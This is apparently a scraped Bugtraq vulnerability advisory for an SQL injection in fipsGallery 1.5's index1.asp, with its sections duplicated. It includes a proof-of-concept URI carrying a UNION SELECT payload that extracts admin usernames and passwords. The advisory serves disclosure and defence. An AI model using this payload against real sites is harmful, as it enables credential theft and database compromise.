FipsGallery Index1.ASP SQL Injection Vulnerability
BID:21254
Info
FipsGallery Index1.ASP SQL Injection Vulnerability
| Bugtraq ID: | 21254 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 22 2006 12:00AM |
| Updated: | Nov 26 2006 05:15AM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
fipsASP fipsGallery 1.5 |
| Not Vulnerable: | |
Discussion
FipsGallery Index1.ASP SQL Injection Vulnerability
FipsGallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects version 1.5; other versions may also be vulnerable.
FipsGallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects version 1.5; other versions may also be vulnerable.
Exploit / POC
FipsGallery Index1.ASP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
Solution / Fix
FipsGallery Index1.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail as at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail as at: [email protected]